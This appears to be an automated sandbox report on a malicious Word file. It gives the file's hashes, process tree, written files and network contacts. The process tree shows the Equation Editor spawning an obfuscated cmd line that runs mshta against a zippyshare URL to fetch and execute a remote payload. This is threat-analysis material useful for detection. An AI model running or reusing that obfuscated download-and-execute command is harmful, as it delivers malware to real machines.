File name: | 35675666.doc |
Full analysis: | https://app.any.run/tasks/cda260f0-e628-4778-8381-66b939ef3436 |
Verdict: | Malicious activity |
Analysis date: | January 18, 2020, 07:10:45 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/octet-stream |
File info: | data |
MD5: | 2A59FBAD0927E8B010E5D5C28DB79122 |
SHA1: | EC2911DF98516E90A48ED70780BF97033FF8B12C |
SHA256: | B4C52841FFCAEC585BF77A526DE7B77C25C0A6C08F605CA51C2BFC2C22AC4504 |
SSDEEP: | 96:1X3Pe7ImJ1UzOWpXfVohr4cWsui95/K2/oLMn8tKjJLYnjEldSgpQUiFo9vW1yj:dwvaBXfet4/uiUAMv/ldcUi2M0 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2396 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\35675666.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
3832 | "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | svchost.exe | |
User: admin Company: Design Science, Inc. Integrity Level: MEDIUM Description: Microsoft Equation Editor Exit code: 0 Version: 00110900 | ||||
1792 | cMd /C mS^Ht^a ht^tp^s:^/^/www6.zippyshare.com/v/rIjgm31E/file.html | C:\Windows\system32\cMd.exe | — | EQNEDT32.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2140 | mSHta https://www6.zippyshare.com/v/rIjgm31E/file.html | C:\Windows\system32\mshta.exe | cMd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2396 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA95A.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2396 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9DB4F20A-CB9D-45BA-B022-F5236614C303}.tmp | — | |
MD5:— | SHA256:— | |||
2396 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C39DCD18-3F71-4C41-BC7C-8C57C01A2BCE}.tmp | — | |
MD5:— | SHA256:— | |||
2396 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E9111696-3096-4CBD-8269-C58B2351DFF5}.tmp | — | |
MD5:— | SHA256:— | |||
2396 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$675666.doc | pgc | |
MD5:3E78FF0BD11FF2F2D20FDD3A6A683FC6 | SHA256:A2E7E813F101127BE09DA973408558313CF96EB572D2D1D4EF8F8C0CB801DE8E | |||
2396 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{CF735F48-A03D-4B89-8D0B-9924DF2968F3}.tmp | binary | |
MD5:8C260D1BB6AA92C548F17F872E49E6D2 | SHA256:2A836F0A000947354E90BF48EEB450CDB77BE2543966930900B1012A0C599477 | |||
2396 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:2429C3A5695C3A20FD084E1F0DA0E239 | SHA256:33F01B60DE8A9BF31B867927E957797FBE2F7D0CBEBEDAE6F92FDE90E0EC87F6 |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2140 | mshta.exe | 46.166.139.151:443 | www6.zippyshare.com | NForce Entertainment B.V. | NL | unknown |
Domain | IP | Reputation |
---|---|---|
www6.zippyshare.com |
| unknown |